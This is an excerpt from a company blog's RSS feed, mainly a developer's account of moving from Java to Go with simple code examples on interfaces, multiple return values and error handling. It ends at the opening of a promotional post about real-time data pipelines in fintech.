Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[From Java to Go:  A Developers Journey Pt. 1]]></title><description><![CDATA[Switching from Java to Go? In this first part of the series, I share my journey transitioning from Java to Go, including key differences, challenges, and lessons learned. From implicit interfaces to error handling, multiple return values, and no function overloading—discover what makes Go unique and how to navigate the switch effectively. Whether you're considering Go or already making the move, this guide will help you adapt to Go’s simplicity and efficiency. ]]></description><link>https://meroxa.com/blog/from-java-to-go-a-developers-journey-pt-1</link><guid isPermaLink="false">https://meroxa.com/blog/from-java-to-go-a-developers-journey-pt-1</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Thu, 20 Feb 2025 10:44:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;More than three years ago, I joined Meroxa to work on &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; and its connectors. This job change brought with it another change: the programming language. Conduit and almost all of its connectors are written in Go. For the 11 years before that, I had been working with Java. It’s been a change in many ways, I must confess. 🙂&lt;/p&gt;
&lt;p&gt;That’s also a change many more developers are either making or thinking of making, so I’d like to share my experience hoping it will make your journey to Go better.&lt;/p&gt;
&lt;p&gt;This blog post is the first I plan to write on this topic. I&apos;ll share how I learned Go, give a brief overview of the language, and then dive into the differences between Java and Go, specifically in terms of interfaces and functions.&lt;/p&gt;
&lt;h1&gt;How I learned Go&lt;/h1&gt;
&lt;p&gt;A great way to start with Go is &lt;a href=&quot;https://go.dev/tour/welcome/1&quot;&gt;A Tour of Go&lt;/a&gt;. It’s a tutorial made by the Go team that introduces you to the basic concepts in a very light way, but also lets you try out the code online!&lt;/p&gt;
&lt;p&gt;However, nothing beats a good book when you want to learn systematically. The first book I read about Go was &lt;a href=&quot;https://www.manning.com/books/go-in-action&quot;&gt;Go in Action&lt;/a&gt;, and then I switched to &lt;a href=&quot;https://www.gopl.io/&quot;&gt;The Go Programming Language&lt;/a&gt;. Go in Action is a good book, but I like The Go Programming Language more, mostly because of its approach. Go in Action starts with a comprehensive example project that’s sometimes difficult to follow because several concepts are shown at once. The Go Programming Language, on the other hand, focuses on individual syntax elements and concepts and gradually builds up the knowledge.&lt;/p&gt;
&lt;p&gt;As for hands-on experience, my first task was the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;Kafka connector&lt;/a&gt;. After it was completed, I moved on to other connectors, then Conduit itself, and I also worked for some time on what is now the Conduit Platform.&lt;/p&gt;
&lt;p&gt;Code reviews were a very important part of my learning. My colleagues’ patience when reviewing my code and answering questions about the project(s) and Go helped me tremendously. Reviewing code myself helped as well: it was rarely about improving someone else’s code, and most often about seeing more code and asking questions about it.&lt;/p&gt;
&lt;h1&gt;A quick introduction to Go&lt;/h1&gt;
&lt;p&gt;Many call it Golang, but, &lt;a href=&quot;https://go.dev/doc/faq#go_or_golang&quot;&gt;officially&lt;/a&gt;, the language’s name is Go.&lt;/p&gt;
&lt;p&gt;Go is a compiled language and needs no runtime in the sense Java does. When you find the Go runtime mentioned, what is meant by that is &lt;strong&gt;not a separate application&lt;/strong&gt; that is executing a binary and managing it (like the Java Runtime does). What is meant by Go runtime are Go’s internal packages that get included in a build and that, for example, execute goroutines (Go’s green threads). In other words, users don’t need to have a Go runtime installed to be able to run applications written in Go.&lt;/p&gt;
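&lt;p&gt;To make the goroutine part concrete, here’s a minimal, self-contained sketch (the &lt;code class=&quot;language-text&quot;&gt;sum&lt;/code&gt; function is my own example, not from any library): it starts two goroutines and lets the Go runtime schedule them, with no thread pool or executor setup.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;package main

import (
    &quot;fmt&quot;
    &quot;sync&quot;
)

// sum adds the numbers in a slice using two goroutines, one per half.
func sum(nums []int) int {
    var wg sync.WaitGroup
    results := make(chan int, 2)
    half := len(nums) / 2
    for _, chunk := range [][]int{nums[:half], nums[half:]} {
        wg.Add(1)
        go func(c []int) {
            defer wg.Done()
            total := 0
            for _, n := range c {
                total += n
            }
            results &amp;lt;- total
        }(chunk)
    }
    wg.Wait()
    close(results)
    grand := 0
    for partial := range results {
        grand += partial
    }
    return grand
}

func main() {
    fmt.Println(sum([]int{1, 2, 3, 4})) // prints 10
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;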
&lt;p&gt;Go is very much about simplicity, clarity, and decoupling. Java code is sometimes known for its verbosity, and that’s true to an extent. Related to that is a famous &lt;a href=&quot;https://go-proverbs.github.io/&quot;&gt;Go proverb&lt;/a&gt;: “A little copying is better than a little dependency.” It’s quite normal to grab an Apache Commons library to do a small thing or two in a Java project. In Go, however, you’ll often just copy a few lines of code.&lt;/p&gt;
&lt;p&gt;When you &lt;a href=&quot;https://go.dev/doc/install&quot;&gt;install Go&lt;/a&gt;, you also get quite a few tools, such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go build&lt;/code&gt; for building&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go test&lt;/code&gt; for running tests (it works, but it&apos;s a shock after JUnit)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go get&lt;/code&gt; for getting dependencies&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go install&lt;/code&gt; for installing runnable tools (think of a package manager kind of thing)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Go itself provides a way to manage dependencies: the &lt;a href=&quot;https://go.dev/ref/mod#vcs-find&quot;&gt;go.mod&lt;/a&gt; file (similar to &lt;code class=&quot;language-text&quot;&gt;build.gradle&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;pom.xml&lt;/code&gt;). Dependencies are most often found on GitHub and fetched (indirectly) through &lt;a href=&quot;https://pkg.go.dev/&quot;&gt;pkg.go.dev&lt;/a&gt;.&lt;/p&gt;
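&lt;p&gt;For illustration, a minimal &lt;code class=&quot;language-text&quot;&gt;go.mod&lt;/code&gt; could look like this (the module path and version numbers here are made up):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;module github.com/example/my-app

go 1.22

require (
    github.com/google/uuid v1.6.0
)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;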
&lt;p&gt;Now let’s get to the code!&lt;/p&gt;
&lt;h1&gt;Interfaces&lt;/h1&gt;
&lt;p&gt;Go interfaces and Java interfaces are declared in similar ways, so we won’t spend too much time on that. One difference is that Go doesn’t allow default interface methods, whereas Java does. The second, and probably biggest, difference is how the interfaces are used.&lt;/p&gt;
&lt;p&gt;Java uses a &lt;a href=&quot;https://en.wikipedia.org/wiki/Nominal_type_system&quot;&gt;nominative type system&lt;/a&gt;. Classes that implement an interface &lt;strong&gt;must&lt;/strong&gt; use the &lt;code class=&quot;language-text&quot;&gt;implements&lt;/code&gt; keyword, i.e. they state &lt;strong&gt;explicitly&lt;/strong&gt; which behavior they implement.&lt;/p&gt;
&lt;p&gt;Go’s type system is &lt;a href=&quot;https://en.wikipedia.org/wiki/Structural_type_system&quot;&gt;structural&lt;/a&gt;. Structs implement an interface &lt;strong&gt;implicitly&lt;/strong&gt; and the Go compiler checks if a value conforms to an interface. Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;fmt&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; FileReader &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;FileReader&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Read&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;a line from a file&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Reader &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;Read&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// declare a variable of the type Reader &lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; r Reader
    &lt;span class=&quot;token comment&quot;&gt;// Assign a pointer to a FileReader to r&lt;/span&gt;
    r &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;FileReader&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Read&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you want to be sure that a struct implements an interface, you can add the following compile-time check:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; _ Reader &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;FileReader&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A good practice is to define the interface where it’s used, and not where it’s implemented.&lt;/p&gt;
&lt;p&gt;This unlocks some useful things. One is that you can always declare an interface, and make sure your code’s intention is clear: it needs the &lt;code class=&quot;language-text&quot;&gt;Read&lt;/code&gt; method, not &lt;code class=&quot;language-text&quot;&gt;FileReader&lt;/code&gt; itself.&lt;/p&gt;
&lt;p&gt;Another benefit is visible in tests: since you can always define an interface yourself, you can also easily create mocks or write stubs for it and write better tests.&lt;/p&gt;
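&lt;p&gt;Here’s a small sketch of both ideas (the names are mine, not from a real library): the consuming code declares the tiny &lt;code class=&quot;language-text&quot;&gt;Reader&lt;/code&gt; interface it needs, and a test can satisfy it with a stub.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;package main

import &quot;fmt&quot;

// Reader is declared where it is consumed: this code only needs Read.
type Reader interface {
    Read() string
}

// firstLine works with any Reader, real or stubbed.
func firstLine(r Reader) string {
    return &quot;first line: &quot; + r.Read()
}

// stubReader satisfies Reader implicitly; no &quot;implements&quot; keyword needed.
type stubReader struct{}

func (stubReader) Read() string { return &quot;stubbed data&quot; }

func main() {
    fmt.Println(firstLine(stubReader{})) // prints &quot;first line: stubbed data&quot;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;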
&lt;h1&gt;Functions&lt;/h1&gt;
&lt;p&gt;Functions in Go are generally what methods are in Java. Go has methods too: those are functions defined on types, i.e. functions that have a receiver. They’re &lt;em&gt;very close&lt;/em&gt; to object methods in Java, but there’s a difference that we’ll explain in a later blog post. Here are the most important differences between Go functions and Java methods.&lt;/p&gt;
&lt;h2&gt;No overloading&lt;/h2&gt;
&lt;p&gt;In Go, no two functions in the same package can have the same name, regardless of the number or types of their parameters. At first this might be irritating, but over time you get used to it and simply work around it, either by using generics or by reconsidering whether the overload is really needed and whether the code can be simplified.&lt;/p&gt;
&lt;h2&gt;Multiple return values&lt;/h2&gt;
&lt;p&gt;A function can return multiple values. You might be thinking: “No way, that’s horrible!” You have my full understanding; that was my reaction too. It immediately reminded me of the &lt;code class=&quot;language-text&quot;&gt;out&lt;/code&gt; parameter in C#, yuck. However, it makes it possible to write simpler code for use cases that need to return two values, like splitting a string into a key and a value, or getting the host and path from a URL. When a function needs to return 3, 4, or more values, though, that’s likely a code smell, and the code can usually be simplified.&lt;/p&gt;
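&lt;p&gt;As a sketch, a function splitting a string into a key and a value could look like this (&lt;code class=&quot;language-text&quot;&gt;splitKeyValue&lt;/code&gt; is a made-up helper built on the standard library’s &lt;code class=&quot;language-text&quot;&gt;strings.Cut&lt;/code&gt;):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;package main

import (
    &quot;fmt&quot;
    &quot;strings&quot;
)

// splitKeyValue returns the key and the value of a &quot;key=value&quot; string.
// The value is empty when there is no &apos;=&apos; separator.
func splitKeyValue(s string) (string, string) {
    key, value, _ := strings.Cut(s, &quot;=&quot;)
    return key, value
}

func main() {
    key, value := splitKeyValue(&quot;host=localhost&quot;)
    fmt.Println(key, value) // prints &quot;host localhost&quot;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;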
&lt;p&gt;Most often, though, you’ll see a function return two values at most, and when that happens it’s usually a “real” return value and an error, like here:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// Sqrt returns the square root of the input parameter.&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// It returns an error if the parameter is negative.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Sqrt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;x &lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We’ll explain the &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; next.&lt;/p&gt;
&lt;h1&gt;Error handling&lt;/h1&gt;
&lt;p&gt;Go code signals errors by returning &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; values. &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; is a special built-in interface:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// The error built-in interface type is the conventional interface for&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// representing an error condition, with the nil value representing no error.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A nil &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; denotes success; a non-nil &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; denotes failure. In a way, it’s the Go version of Java’s &lt;code class=&quot;language-text&quot;&gt;Exception&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In Go, you can construct your own error types (like in &lt;a href=&quot;https://go.dev/tour/methods/19&quot;&gt;this example&lt;/a&gt; from the Tour of Go). But (and that’s another difference in thinking) most of the time you work with error values: you create new error values and check for error values. In Java code, it’s not uncommon to see new exception classes being written, and &lt;code class=&quot;language-text&quot;&gt;try-catch&lt;/code&gt; blocks normally check for exception classes too.&lt;/p&gt;
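&lt;p&gt;For completeness, here’s a sketch of a custom error type and how you’d check for it with &lt;code class=&quot;language-text&quot;&gt;errors.As&lt;/code&gt; (the &lt;code class=&quot;language-text&quot;&gt;NegativeNumberError&lt;/code&gt; type is hypothetical):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;package main

import (
    &quot;errors&quot;
    &quot;fmt&quot;
)

// NegativeNumberError is a custom error type; defining Error() makes it
// satisfy the built-in error interface.
type NegativeNumberError struct {
    Value float64
}

func (e *NegativeNumberError) Error() string {
    return fmt.Sprintf(&quot;cannot use negative number: %v&quot;, e.Value)
}

func check(x float64) error {
    if x &amp;lt; 0 {
        return &amp;amp;NegativeNumberError{Value: x}
    }
    return nil
}

func main() {
    err := check(-2)
    var nne *NegativeNumberError
    if errors.As(err, &amp;amp;nne) {
        fmt.Println(&quot;got a NegativeNumberError for&quot;, nne.Value)
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;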
&lt;p&gt;Here’s some typical Go code that returns a new error value:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; x &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cannot use negative number&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Or you create a new error from an existing one, indicating the cause:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// ErrAlreadyRunning is an error variable.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; ErrAlreadyRunning &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pipeline already running&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;runPipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isRunning&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
       &lt;span class=&quot;token comment&quot;&gt;// we return a new error indicating that it was caused by ErrAlreadyRunning&lt;/span&gt;
       &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Errorf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;couldn&apos;t run pipeline: %w&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ErrAlreadyRunning&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token comment&quot;&gt;// rest of code&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It’s similar to creating a new exception in Java with another exception as a cause and a custom message. If our error handling needs to check whether an error has a certain cause, we again check for the value, for example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;runPipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;abc123&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Is&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ErrAlreadyRunning&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Pipeline is already running&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1&gt;Wrapping Up&lt;/h1&gt;
&lt;p&gt;Transitioning from Java to Go is a journey of unlearning, relearning, and embracing simplicity. While some concepts in Go—like multiple return values or implicit interfaces—may feel unconventional at first, over time they reveal their elegance and strength.&lt;/p&gt;
&lt;p&gt;If you’re considering learning Go or making the switch, remember: it’s less about mastering a new syntax and more about adapting to a different way of thinking. And once you do, it’s a pretty rewarding shift. 🚀&lt;/p&gt;
&lt;p&gt;I hope this post gave you a helpful starting point and some clarity on the key differences between Java and Go. In the following posts, I&apos;ll cover more topics like the ecosystems, packages (you’ll be surprised about this), structs, types of receivers, and more.&lt;/p&gt;
&lt;p&gt;Want to stay in the loop? Join our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, or subscribe to our &lt;a href=&quot;https://meroxa.com/blog/rss.xml&quot;&gt;RSS feed&lt;/a&gt; for future posts!&lt;/p&gt;
&lt;p&gt;Thanks for reading, and happy coding! 🧑‍💻✨&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How Real-Time Data Pipelines Drive Financial Insights in Fintech]]></title><description><![CDATA[This blog explores how real-time data pipelines can cut fraud losses by 60%, reduce compliance costs by 50%, and drive multi-million dollar savings. Learn how fintech CTOs can leverage modern data architectures for sub-millisecond transaction processing, AI-driven risk management, and scalable infrastructure to future-proof their financial operations. ]]></description><link>https://meroxa.com/blog/how-real-time-data-pipelines-drive-financial-insights-in-fintech</link><guid isPermaLink="false">https://meroxa.com/blog/how-real-time-data-pipelines-drive-financial-insights-in-fintech</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Tue, 18 Feb 2025 11:54:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;Executive Summary&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In the &lt;strong&gt;fintech industry&lt;/strong&gt;, real-time data processing is critical for &lt;strong&gt;fraud detection, compliance monitoring, high-frequency trading, and AI-driven customer insights&lt;/strong&gt;. Traditional batch-based financial data pipelines introduce unacceptable delays, leading to &lt;strong&gt;financial losses, regulatory fines, and poor user experiences&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Key Industry Insights:&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/industry-insights.png&quot; alt=&quot;industry-insights.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;By implementing &lt;strong&gt;real-time data pipelines&lt;/strong&gt;, fintech companies can:&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Prevent fraud before it happens&lt;/strong&gt;
✅ &lt;strong&gt;Deliver AI-powered financial insights instantly&lt;/strong&gt;
✅ &lt;strong&gt;Optimize trading and payment processing with sub-millisecond latency&lt;/strong&gt;
✅ &lt;strong&gt;Ensure regulatory compliance effortlessly&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cut Fraud Losses by 60%—Deploy Real-Time Pipelines &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Today&lt;/a&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Why Real-Time Data is Critical for Fintech Success&lt;/strong&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;Challenges of Legacy Financial Data Processing&lt;/strong&gt;&lt;/h4&gt;
